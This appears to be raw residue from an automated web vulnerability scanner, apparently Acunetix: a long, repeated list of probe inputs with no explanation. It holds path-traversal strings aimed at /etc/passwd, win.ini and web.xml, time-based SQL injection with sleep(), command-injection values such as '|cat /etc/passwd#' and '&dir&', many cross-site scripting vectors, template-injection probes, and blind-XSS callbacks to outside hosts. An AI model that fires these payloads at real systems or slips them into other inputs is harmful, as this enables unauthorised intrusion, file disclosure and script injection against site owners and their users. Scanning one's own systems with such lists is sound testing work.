"+response.write(9210923*9032139)+"

../../../../../../../../../../etc/passwd

1

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

WEB-INF\web.xml

SomeCustomInjectedHeader:injected_by_wvs

1

1<iframe src='data:text/html

"&cat /etc/passwd&"

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

1

1<body onload=prompt(954862)>

cat /etc/passwd

1

SomeCustomInjectedHeader:injected_by_wvs

1

-1

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(943598)>

1

../../../../../../../../../../etc/passwd.jpg

1

`cat /etc/passwd`

1

1

1

-1)

1

1<img src=xyz OnErRor=prompt(941314)>

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

${100028+99829}

1

|cat /etc/passwd#

1

1

-1))

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1<img/src=">" onerror=alert(966489)>

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

1

'|'ld

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

)

1<ScRiPt%20>prompt(988447)</sCripT>

cN4StWv9'

1&n983997=v965579

"|"ld

1

1some_inexistent_file_with_long_name%00.jpg

1

1

1&lt

q17OLiOA')

!(()&&!|*|*|

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

'"()

1

1

/etc/passwd

2vaKLsDz'))

^(#$!@#$)(()))******

\xf6<img acu onmouseover=prompt(937714) //\xf6>

http://testasp.vulnweb.com/t/xss.html?%00.jpg

'

1

'

testasp.vulnweb.com

1

1

1<input autofocus onfocus=prompt(914171)>

-1

1

"

1

1

"

1

||cat /etc/passwd

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

-1)

1

<a href='http://www.acunetix.com'>website security</a>

${@print(md5(acunetix_wvs_security_test))}

1

http://hitgtrKCsjRVo.bxss.me/

acunetix_wvs_invalid_filename

&dir

1

[url=http://www.acunetix.com]website security[/url]

-1))

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

${@print(md5(acunetix_wvs_security_test))}\

1

1

comments

'&dir&'

1

1

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

szOFzntu'

1_wxAax <ScRiPt >prompt(978281)</ScRiPt>

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

1

"&dir&"

comments

1

http://www.acunetix.tst

1

21eDl4Cg')

1

|dir

'"

1

1

comments/.

file:///etc/passwd

TF0ksq57'))

1

1'"()&%<ScRiPt >prompt(978753)</ScRiPt>

1

1

1

1

<!--

'|dir

1

'"()&%<ScRiPt >prompt(976452)</ScRiPt>

1

/\../\../\../\../\../\../\../etc/passwd

1

"|dir

1

1

1

1

WEB-INF/web.xml

1_904905

1

1

1

1

1

1

WEB-INF\web.xml

1

acu4387\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca4387

1

1

1

1

../../../../../../../../../../windows/win.ini

acux9279\xc0\xbez1\xc0\xbcz2a\x90bcxuca9279

1

1

1

../../../../../../../../../../boot.ini

1<ScRiPt >prompt(943756)</ScRiPt>

1

1

1

1<script>prompt(972977)</script>

../../../../../../../../../../windows/win.ini.jpg

1

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1<ScRiPt >prompt(977477)</ScRiPt>

1

1

1

................windowswin.ini

1

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?942690></ScRiPt>

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1<ScRiPt >prompt(901553)</ScRiPt>

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1<video><source onerror="javascript:prompt(937885)">

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(906071)"></g></svg>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

response.write(9557518*9503496)

1<div style=width:expression(prompt(916845))>

1

1

1

'+response.write(9557518*9503496)+'

1<iframe src='data:text/html

1

&cat /etc/passwd&

WEB-INF/web.xml

1

"+response.write(9557518*9503496)+"

1<body onload=prompt(954596)>

1

../../../../../../../../../../etc/passwd

SomeCustomInjectedHeader:injected_by_wvs

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

1

'&cat /etc/passwd&'

WEB-INF\web.xml

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(908199)>

1

SomeCustomInjectedHeader:injected_by_wvs

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

"&cat /etc/passwd&"

1

1

1

1

1<img src=xyz OnErRor=prompt(987698)>

SomeCustomInjectedHeader:injected_by_wvs

1

-1

cat /etc/passwd

../../../../../../../../../../etc/passwd.jpg

1

1

1<img/src=">" onerror=alert(902320)>

1

${100482+99680}

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

`cat /etc/passwd`

1

-1)

1<ScRiPt%20>prompt(984026)</sCripT>

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1&n943604=v906937

-1))

1&lt

|cat /etc/passwd#

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

1

1some_inexistent_file_with_long_name%00.jpg

1

)

grkfI2vq'

'|'ld

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

\xf6<img acu onmouseover=prompt(978442) //\xf6>

pVhmaeh9')

http://testasp.vulnweb.com/t/xss.html?%00.jpg

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

!(()&&!|*|*|

/etc/passwd

1

1<input autofocus onfocus=prompt(946615)>

'"()

"|"ld

'

testasp.vulnweb.com

^(#$!@#$)(()))******

oZxiAVol'))

1

1

<a href='http://www.acunetix.com'>website security</a>

1

1

-1

1

"

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

[url=http://www.acunetix.com]website security[/url]

'

1

acunetix_wvs_invalid_filename

${@print(md5(acunetix_wvs_security_test))}

1

-1)

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

comments

http://hittWymRuculU.bxss.me/

1_RysRD <ScRiPt >prompt(949994)</ScRiPt>

"

1

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

-1))

${@print(md5(acunetix_wvs_security_test))}\

1

1

1

1

||cat /etc/passwd

comments

1

hZHJsl35'

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

1

comments/.

&dir

http://www.acunetix.tst

1

1

1

1

bvXkdwis')

1

file:///etc/passwd

1

'&dir&'

hqwdJ5GF'))

1'"()&%<ScRiPt >prompt(935238)</ScRiPt>

1

'"

1

1

1

"&dir&"

1

/\../\../\../\../\../\../\../etc/passwd

1

'"()&%<ScRiPt >prompt(983651)</ScRiPt>

<!--

1

1

|dir

1

1_981894

WEB-INF/web.xml

1

1

1

'|dir

1

1

1

1

WEB-INF\web.xml

"|dir

acu9169\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca9169

1

1

../../../../../../../../../../windows/win.ini

acux9458\xc0\xbez1\xc0\xbcz2a\x90bcxuca9458

1

1

1

../../../../../../../../../../boot.ini

1

1

1<ScRiPt >prompt(900386)</ScRiPt>

../../../../../../../../../../windows/win.ini.jpg

1

1

1

1<script>prompt(956271)</script>

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1<ScRiPt >prompt(920240)</ScRiPt>

1

................windowswin.ini

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?940456></ScRiPt>

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1<ScRiPt >prompt(953595)</ScRiPt>

1

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1<video><source onerror="javascript:prompt(936112)">

1

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(903430)"></g></svg>

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1<div style=width:expression(prompt(969286))>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

response.write(9908211*9781733)

1

&cat /etc/passwd&

1

1<iframe src='data:text/html

'+response.write(9908211*9781733)+'

1

1

1

WEB-INF/web.xml

1<body onload=prompt(981138)>

SomeCustomInjectedHeader:injected_by_wvs

'&cat /etc/passwd&'

1

../../../../../../../../../../etc/passwd

1

"+response.write(9908211*9781733)+"

SomeCustomInjectedHeader:injected_by_wvs

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(934828)>

WEB-INF\web.xml

1

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

"&cat /etc/passwd&"

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1<img src=xyz OnErRor=prompt(992657)>

1

SomeCustomInjectedHeader:injected_by_wvs

1

1

../../../../../../../../../../etc/passwd.jpg

1

cat /etc/passwd

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

1<img/src=">" onerror=alert(903016)>

1

1

1

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

-1

1<ScRiPt%20>prompt(929691)</sCripT>

`cat /etc/passwd`

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

1

-1)

|cat /etc/passwd#

1&lt

1

${99478+100170}

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

-1))

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

1

'|'ld

\xf6<img acu onmouseover=prompt(938218) //\xf6>

1

1&n905080=v982472

1some_inexistent_file_with_long_name%00.jpg

Dw5BpFTM'

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

)

1

1

1<input autofocus onfocus=prompt(987220)>

"|"ld

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

I08IbJSJ')

!(()&&!|*|*|

1

/etc/passwd

'"()

http://testasp.vulnweb.com/t/xss.html?%00.jpg

cdXSB9QH'))

testasp.vulnweb.com

<a href='http://www.acunetix.com'>website security</a>

^(#$!@#$)(()))******

1

1

1

'

1

'

[url=http://www.acunetix.com]website security[/url]

-1

1

"

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

1

-1)

1

1_5tjmv <ScRiPt >prompt(920359)</ScRiPt>

"

1

acunetix_wvs_invalid_filename

http://hitlerYkbmslq.bxss.me/

${@print(md5(acunetix_wvs_security_test))}

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

||cat /etc/passwd

-1))

1

1

1

${@print(md5(acunetix_wvs_security_test))}\

comments

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

eShFNvxs'

1

1

&dir

1

comments

1

1

SEoNiW5m')

1

1

'&dir&'

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

http://www.acunetix.tst

comments/.

file:///etc/passwd

'"

1

ictOnf5C'))

1

1'"()&%<ScRiPt >prompt(997138)</ScRiPt>

"&dir&"

1

/\../\../\../\../\../\../\../etc/passwd

1

1

<!--

1

'"()&%<ScRiPt >prompt(976287)</ScRiPt>

|dir

1

1

WEB-INF/web.xml

1

1

1

'|dir

1_943514

1

WEB-INF\web.xml

1

1

acu1144\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca1144

1

"|dir

1

1

../../../../../../../../../../windows/win.ini

1

acux2590\xc0\xbez1\xc0\xbcz2a\x90bcxuca2590

1

1

1

1

../../../../../../../../../../boot.ini

1<ScRiPt >prompt(976879)</ScRiPt>

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1

1

1<script>prompt(919631)</script>

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1<ScRiPt >prompt(941573)</ScRiPt>

1

................windowswin.ini

1

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?965697></ScRiPt>

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1<ScRiPt >prompt(903641)</ScRiPt>

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1<video><source onerror="javascript:prompt(988549)">

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(916659)"></g></svg>

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

1<div style=width:expression(prompt(993197))>

1

response.write(9022820*9219497)

1<iframe src='data:text/html

1

WEB-INF/web.xml

1

'+response.write(9022820*9219497)+'

1<body onload=prompt(903645)>

WEB-INF\web.xml

1

1

"+response.write(9022820*9219497)+"

1

&cat /etc/passwd&

SomeCustomInjectedHeader:injected_by_wvs

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(971253)>

../../../../../../../../../../etc/passwd

1

1

'&cat /etc/passwd&'

1

1

SomeCustomInjectedHeader:injected_by_wvs

1

1<img src=xyz OnErRor=prompt(926174)>

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

"&cat /etc/passwd&"

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

1

SomeCustomInjectedHeader:injected_by_wvs

1

1<img/src=">" onerror=alert(964374)>

../../../../../../../../../../etc/passwd.jpg

cat /etc/passwd

1

1

1<ScRiPt%20>prompt(921882)</sCripT>

1

1

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

1

1

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

`cat /etc/passwd`

1&lt

-1

1

${100056+99377}

1

1

|cat /etc/passwd#

1

\xf6<img acu onmouseover=prompt(936742) //\xf6>

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

1

-1)

1

)

1<input autofocus onfocus=prompt(911413)>

'|'ld

1&n989537=v942781

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

-1))

1some_inexistent_file_with_long_name%00.jpg

1

"|"ld

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

<a href='http://www.acunetix.com'>website security</a>

!(()&&!|*|*|

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

'"()

cV6zDbdD'

1

^(#$!@#$)(()))******

http://testasp.vulnweb.com/t/xss.html?%00.jpg

[url=http://www.acunetix.com]website security[/url]

/etc/passwd

'

1

ZQ1JpMwE')

1

testasp.vulnweb.com

'

1_t0xTF <ScRiPt >prompt(985856)</ScRiPt>

1

1

"

1

1

CFVkYc1G'))

1

"

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

${@print(md5(acunetix_wvs_security_test))}

1

||cat /etc/passwd

-1

1

http://hitF2jfhGymzS.bxss.me/

${@print(md5(acunetix_wvs_security_test))}\

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

acunetix_wvs_invalid_filename

1

-1)

1

&dir

1

1

1

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

comments

1

'&dir&'

-1))

1

1

http://www.acunetix.tst

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

ClJJeXYs'

"&dir&"

'"

comments

1

1

file:///etc/passwd

1

1

zoBIIo6L')

1'"()&%<ScRiPt >prompt(959167)</ScRiPt>

<!--

|dir

comments/.

1

1

/\../\../\../\../\../\../\../etc/passwd

'"()&%<ScRiPt >prompt(937236)</ScRiPt>

Al5n5sVo'))

'|dir

1

1

WEB-INF/web.xml

1

1

1

1_986907

"|dir

1

1

WEB-INF\web.xml

1

1

1

1

1

acu8117\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca8117

1

../../../../../../../../../../windows/win.ini

1

1

acux1414\xc0\xbez1\xc0\xbcz2a\x90bcxuca1414

1

../../../../../../../../../../boot.ini

1

1

1

1<ScRiPt >prompt(960853)</ScRiPt>

1

../../../../../../../../../../windows/win.ini.jpg

1

1

1

1<script>prompt(908101)</script>

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1<ScRiPt >prompt(944439)</ScRiPt>

1

1

................windowswin.ini

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?988301></ScRiPt>

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1<ScRiPt >prompt(901922)</ScRiPt>

1

1

1

1<video><source onerror="javascript:prompt(915901)">

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(979229)"></g></svg>

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

response.write(9400384*9626279)

1<div style=width:expression(prompt(990187))>

1

1<iframe src='data:text/html

1

&cat /etc/passwd&

'+response.write(9400384*9626279)+'

1

1<body onload=prompt(902423)>

1

WEB-INF/web.xml

'&cat /etc/passwd&'

SomeCustomInjectedHeader:injected_by_wvs

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(973766)>

"+response.write(9400384*9626279)+"

../../../../../../../../../../etc/passwd

SomeCustomInjectedHeader:injected_by_wvs

1

"&cat /etc/passwd&"

WEB-INF\web.xml

1<img src=xyz OnErRor=prompt(960601)>

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

cat /etc/passwd

SomeCustomInjectedHeader:injected_by_wvs

1<img/src=">" onerror=alert(985252)>

1

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

1

1

1

../../../../../../../../../../etc/passwd.jpg

`cat /etc/passwd`

-1

1

1<ScRiPt%20>prompt(940539)</sCripT>

1

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

${99795+99873}

1&lt

-1)

1

|cat /etc/passwd#

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

1&n998826=v955901

\xf6<img acu onmouseover=prompt(984179) //\xf6>

-1))

'|'ld

1

1

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

1some_inexistent_file_with_long_name%00.jpg

LSI1bPOJ'

1<input autofocus onfocus=prompt(929692)>

)

"|"ld

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

http://testasp.vulnweb.com/t/xss.html?%00.jpg

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

<a href='http://www.acunetix.com'>website security</a>

!(()&&!|*|*|

gbBPnsqt')

'"()

1

1

/etc/passwd

testasp.vulnweb.com

64j0V0SI'))

^(#$!@#$)(()))******

[url=http://www.acunetix.com]website security[/url]

'

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

'

1

"

1

-1

1

1_jvdFb <ScRiPt >prompt(998707)</ScRiPt>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

${@print(md5(acunetix_wvs_security_test))}

1

acunetix_wvs_invalid_filename

"

-1)

${@print(md5(acunetix_wvs_security_test))}\

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

1

http://hitZNbdpAiDUm.bxss.me/

1

-1))

comments

||cat /etc/passwd

1

1

1

1

1

6sDsSTW3'

1

comments

1

&dir

file:///etc/passwd

1

1

1

TIN8IAST')

comments/.

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

'"

'&dir&'

http://www.acunetix.tst

1

1

1

/\../\../\../\../\../\../\../etc/passwd

z53frWuk'))

1

1

"&dir&"

1

<!--

1

1

1

1'"()&%<ScRiPt >prompt(982927)</ScRiPt>

WEB-INF/web.xml

1

1

|dir

1

1

1

WEB-INF\web.xml

'"()&%<ScRiPt >prompt(929222)</ScRiPt>

1

'|dir

1

1

../../../../../../../../../../windows/win.ini

1

1_970725

"|dir

1

../../../../../../../../../../boot.ini

1

1

1

../../../../../../../../../../windows/win.ini.jpg

1

acu3836\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca3836

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

acux1400\xc0\xbez1\xc0\xbcz2a\x90bcxuca1400

1

1

................windowswin.ini

1

1

1

1<ScRiPt >prompt(993606)</ScRiPt>

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1<script>prompt(973529)</script>

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1<ScRiPt >prompt(953604)</ScRiPt>

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?946676></ScRiPt>

1

1

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1<ScRiPt >prompt(950321)</ScRiPt>

1

1

response.write(9285266*9795963)

1

1<video><source onerror="javascript:prompt(955048)">

1

'+response.write(9285266*9795963)+'

1

WEB-INF/web.xml

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(959496)"></g></svg>

&cat /etc/passwd&

1

"+response.write(9285266*9795963)+"

1

1

1<div style=width:expression(prompt(991109))>

WEB-INF\web.xml

'&cat /etc/passwd&'

SomeCustomInjectedHeader:injected_by_wvs

../../../../../../../../../../etc/passwd

1

1

1

SomeCustomInjectedHeader:injected_by_wvs

1

"&cat /etc/passwd&"

1<iframe src='data:text/html

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

SomeCustomInjectedHeader:injected_by_wvs

1

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

1<body onload=prompt(948061)>

cat /etc/passwd

1

1

1

1

../../../../../../../../../../etc/passwd.jpg

1

`cat /etc/passwd`

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

-1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(920907)>

${99799+99036}

1

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1

|cat /etc/passwd#

1<img src=xyz OnErRor=prompt(985833)>

1

1

-1)

1some_inexistent_file_with_long_name%00.jpg

'|'ld

1

1

1&n960269=v969078

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1<img/src=">" onerror=alert(914926)>

-1))

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

)

1

1

"|"ld

1<ScRiPt%20>prompt(913761)</sCripT>

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

testasp.vulnweb.com

E40ICVjC'

1

1

!(()&&!|*|*|

1&lt

1

1

'"()

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

hNQAcS15')

http://testasp.vulnweb.com/t/xss.html?%00.jpg

'

^(#$!@#$)(()))******

\xf6<img acu onmouseover=prompt(962526) //\xf6>

1

1

/etc/passwd

Zwdj4lZV'))

'

1

1

"

1

1

1<input autofocus onfocus=prompt(974267)>

1

-1

||cat /etc/passwd

1

1

"

1

-1)

1

<a href='http://www.acunetix.com'>website security</a>

1

1

${@print(md5(acunetix_wvs_security_test))}

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

http://hitMvIK4jXOqT.bxss.me/

acunetix_wvs_invalid_filename

&dir

[url=http://www.acunetix.com]website security[/url]

1

-1))

1

1

'&dir&'

comments

${@print(md5(acunetix_wvs_security_test))}\

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1_z72md <ScRiPt >prompt(988579)</ScRiPt>

wP9gTYZS'

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

http://www.acunetix.tst

1

1

"&dir&"

1

m4Jrsdfp')

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

comments

1

'"

|dir

1

1

1

1'"()&%<ScRiPt >prompt(935576)</ScRiPt>

1

FTxHSDDf'))

'|dir

1

<!--

comments/.

1

'"()&%<ScRiPt >prompt(908124)</ScRiPt>

1

1

file:///etc/passwd

1

1

1

"|dir

1

1_970364

1

/\../\../\../\../\../\../\../etc/passwd

1

1

1

1

1

WEB-INF/web.xml

acu6393\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca6393

1

1

1

WEB-INF\web.xml

1

1

acux4030\xc0\xbez1\xc0\xbcz2a\x90bcxuca4030

1

1

../../../../../../../../../../windows/win.ini

1

1

1<ScRiPt >prompt(988667)</ScRiPt>

1

1

../../../../../../../../../../boot.ini

1<script>prompt(948756)</script>

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1

1<ScRiPt >prompt(933298)</ScRiPt>

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1

................windowswin.ini

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?933551></ScRiPt>

1

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1<ScRiPt >prompt(986398)</ScRiPt>

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

1

1<video><source onerror="javascript:prompt(989848)">

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

